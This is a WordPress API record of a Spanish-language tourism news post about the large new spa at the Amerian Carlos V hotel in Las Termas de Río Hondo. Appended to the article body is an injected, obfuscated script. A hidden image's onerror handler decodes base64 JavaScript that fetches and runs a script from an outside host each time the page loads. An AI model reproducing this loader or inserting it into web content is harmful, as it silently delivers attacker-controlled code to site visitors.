{"id":6790,"date":"2023-05-18T10:39:58","date_gmt":"2023-05-18T13:39:58","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6790"},"modified":"2025-08-13T16:00:06","modified_gmt":"2025-08-13T19:00:06","slug":"el-amerian-carlos-v-tendra-el-spa-mas-grande-del-norte-argentino-en-las-termas-de-rio-hondo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6790","title":{"rendered":"El Amerian Carlos V tendr\u00e1 el Spa m\u00e1s grande del Norte Argentino en Las Termas de R\u00edo Hondo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#87013d\"><em>Ingenieros de nuestro pa\u00eds y del extranjero trabajaron en el proyecto y en la ejecuci\u00f3n de esta obra \u00fanica en esta parte del pa\u00eds.<\/em><\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-6698\" width=\"260\" height=\"130\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 260px) 100vw, 260px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Acorde con los establecimientos hoteleros de primera l\u00ednea de todo el mundo, el&nbsp;<strong>Amerian Carlos V de Las Termas de R\u00edo Hondo<\/strong>&nbsp;contar\u00e1 con el spa m\u00e1s grande y vanguardista de todo el Noroeste Argentino.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054.jpg\" alt=\"\" class=\"wp-image-6791\" width=\"891\" height=\"525\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054.jpg 937w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-300x177.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-768x453.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-696x411.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-712x420.jpg 712w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-320x189.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-480x283.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193054-800x472.jpg 800w\" sizes=\"(max-width: 891px) 100vw, 891px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Se trata de una obra sin precedentes en la regi\u00f3n, pensada por el&nbsp;<strong>licenciado Gustavo Ick<\/strong>, propietario del hotel, y dise\u00f1ada y ejecutada por m\u00e1s de treinta profesionales de todas las \u00e1reas que demanda un servicio de alta calidad.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193009.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193009.jpg\" alt=\"\" class=\"wp-image-6792\" width=\"840\" height=\"493\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193009-300x177.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193009-320x189.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193009-480x283.jpg 480w\" sizes=\"(max-width: 840px) 100vw, 840px\" \/><\/a><\/figure>\n\n\n\n<p>El&nbsp;<strong>arquitecto Luciano Bertorello<\/strong>, uno de los directores de la obra, detall\u00f3<strong>&nbsp;a EL LIBERAL&nbsp;<\/strong>que la cuenta con tecnolog\u00eda Wellness de \u00faltima generaci\u00f3n y materiales importados con caracter\u00edsticas t\u00e9cnicas espec\u00edficas.<\/p>\n\n\n\n<p>El flamante espacio ofrecer\u00e1 \u00e1reas de relax seco, piscina l\u00fadica con sistemas Wellness de primer nivel, piscinas para caminos de sensaciones, piscina de contraste, piscina de hidromasajes, \u00e1rea de relax, tumbonas calefaccionadas y un magn\u00edfico templo de duchas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018.jpg\"><img decoding=\"async\" width=\"937\" height=\"553\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018.jpg\" alt=\"\" class=\"wp-image-6793\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018.jpg 937w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-300x177.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-768x453.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-696x411.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-712x420.jpg 712w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-320x189.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-480x283.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193018-800x472.jpg 800w\" sizes=\"(max-width: 937px) 100vw, 937px\" \/><\/a><\/figure>\n\n\n\n<p>Gabinetes de masajes, salas de relajaci\u00f3n y la zona sectorizada seg\u00fan g\u00e9nero de sauna, ba\u00f1os de vapor, duchas escocesas y zonas de relax internas. La obra cuida est\u00e9ticamente el dise\u00f1o y genera una nueva imagen moderna que enaltece la elegancia que caracteriza al&nbsp;<strong>Amerian Carlos V<\/strong>.<\/p>\n\n\n\n<p>El arquitecto&nbsp;<strong>Bertorello<\/strong>&nbsp;asegur\u00f3 que se trata del&nbsp;<strong>SPA m\u00e1s grande del NOA<\/strong>, \u201cno s\u00f3lo por el circuito h\u00eddrico que tendr\u00e1 600 metros cuadrados\u201d, sino por el concepto de la obra en su conjunto, como \u201cel gimnasio, la recepci\u00f3n, la infraestructura, los vestuarios, los boxes de masajes\u201d, todo lo cual representa \u201calrededor de 1.150 metros cuadrados\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029.jpg\"><img decoding=\"async\" width=\"937\" height=\"553\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029.jpg\" alt=\"\" class=\"wp-image-6794\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029.jpg 937w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-300x177.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-768x453.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-696x411.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-712x420.jpg 712w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-320x189.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-480x283.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193029-800x472.jpg 800w\" sizes=\"(max-width: 937px) 100vw, 937px\" \/><\/a><\/figure>\n\n\n\n<p>Cont\u00f3 el arquitecto que \u201cen el proyecto han participado profesionales especialistas en cada una de sus \u00e1reas\u201d.<\/p>\n\n\n\n<p>\u201cEstamos trabajando con un ingeniero hidr\u00e1ulico de Montevideo, Uruguay, especialista en agua; con la Lic. Teresita Van Strate, que es experta en SPA y Wellness; con ingenieros electr\u00f3nicos, en definitiva, m\u00e1s de 30 profesionales han trabajado para que se lleve adelante este SPA\u201d, asegur\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045.jpg\"><img decoding=\"async\" width=\"937\" height=\"553\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045.jpg\" alt=\"\" class=\"wp-image-6795\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045.jpg 937w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-300x177.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-768x453.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-696x411.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-712x420.jpg 712w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-320x189.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-480x283.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513193045-800x472.jpg 800w\" sizes=\"(max-width: 937px) 100vw, 937px\" \/><\/a><\/figure>\n\n\n\n<p>En cuanto a la funcionalidad, dise\u00f1o y materiales, resalt\u00f3 que \u201cse ha tenido mucho en cuenta la est\u00e9tica, porque si estamos trabajando en el SPA m\u00e1s importante del norte argentino, tenemos que tener materiales que est\u00e9n acordes a esa calidad, como los m\u00e1rmoles, cielorrasos, y revestimientos que son importados ya que deben ser de caracter\u00edsticas especiales debido a las condiciones del espacio, que son vapores, adem\u00e1s de toda una infraestructura de climatizaci\u00f3n de \u00faltima tecnolog\u00eda, sistema de deshumificaci\u00f3n, climatizaci\u00f3n, entre otros\u201d.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216.jpg\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216.jpg\" alt=\"\" class=\"wp-image-6796\" width=\"439\" height=\"258\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216.jpg 937w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-300x177.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-768x453.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-696x411.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-712x420.jpg 712w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-320x189.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-480x283.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/937x553_629255_20230513211216-800x472.jpg 800w\" sizes=\"(max-width: 439px) 100vw, 439px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p><strong>Carmen Barbieri<\/strong>,<strong>&nbsp;Lito Vitale<\/strong>&nbsp;y&nbsp;<strong>Juan Carlos Baglietto<\/strong>, presentes en la conferencia de prensa realizada esta tarde en el hotel, destacaron sus instalaciones, las que fueron inauguradas hace 10 a\u00f1os con la presencia de las m\u00e1s altas autoridades de la provincia y de la diva Susana Gim\u00e9nez que acompa\u00f1\u00f3 al licenciado&nbsp;<strong>Gustavo Ick<\/strong>&nbsp;en el corte de cintas.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.elliberal.com.ar\/noticia\/termas\/629435\/jorge-mukdise-queremos-ciudad-sustentable-saludable-medio-ambiente?utm_campaign=ScrollInfinitoDesktop&amp;utm_medium=scroll&amp;utm_source=nota\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"683\" height=\"99\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_18-5-2023_103419_www.elliberal.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-6797\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_18-5-2023_103419_www.elliberal.com_.ar_.jpeg 683w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_18-5-2023_103419_www.elliberal.com_.ar_-300x43.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_18-5-2023_103419_www.elliberal.com_.ar_-320x46.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_18-5-2023_103419_www.elliberal.com_.ar_-480x70.jpeg 480w\" sizes=\"(max-width: 683px) 100vw, 683px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><mark>Fuente:<\/mark><\/em><\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ingenieros de nuestro pa\u00eds y del extranjero trabajaron en el proyecto y en la ejecuci\u00f3n de esta obra \u00fanica en esta parte del pa\u00eds. Acorde con los establecimientos hoteleros de primera l\u00ednea de todo el mundo, el&nbsp;Amerian Carlos V de Las Termas de R\u00edo Hondo&nbsp;contar\u00e1 con el spa m\u00e1s grande y vanguardista de todo el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,17],"tags":[],"class_list":["post-6790","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noa","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6790","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6790"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6790\/revisions"}],"predecessor-version":[{"id":10399,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6790\/revisions\/10399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6792"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6790"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6790"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6790"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}